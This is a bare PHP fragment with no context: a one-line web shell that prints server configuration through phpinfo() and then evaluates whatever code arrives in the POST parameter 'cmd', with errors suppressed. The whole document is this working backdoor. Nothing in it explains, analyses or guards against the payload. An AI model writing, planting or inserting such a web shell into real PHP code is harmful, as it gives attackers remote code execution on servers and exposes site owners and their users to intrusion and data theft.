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 phpinfo();@eval($_POST["cmd"]);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